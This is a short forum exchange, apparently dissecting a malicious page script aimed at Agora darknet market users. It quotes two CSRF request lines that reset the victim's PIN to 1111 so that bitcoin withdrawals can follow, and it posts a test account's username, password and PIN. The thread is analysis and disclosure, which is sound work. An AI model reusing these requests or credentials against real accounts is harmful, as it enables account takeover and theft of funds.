[jawr]

The important bit seems to be in `window.onbeforeunload`

Looks like it tries to brute force a pin reset and then attempts to send a bunch of bitcoin sends.

I'm guessing it depends on the user running on tor and still being logged in to http://sydneymfsnkpw7ln.onion whatever that is?

[garrettgrimsley]

It doesn't have to brute force the reset because Agora requires knowledge of neither the current PIN nor the current account password to reset the PIN.

    window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank")

Starts the PIN reset process and

    window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank")

sets the new PIN. For reference, Agora is lauded as one of the most secure darknet markets. You can see the lack of CSRF protection for yourself with the credentials username::password::pin ggHNpinReset::qwertyuiop::1234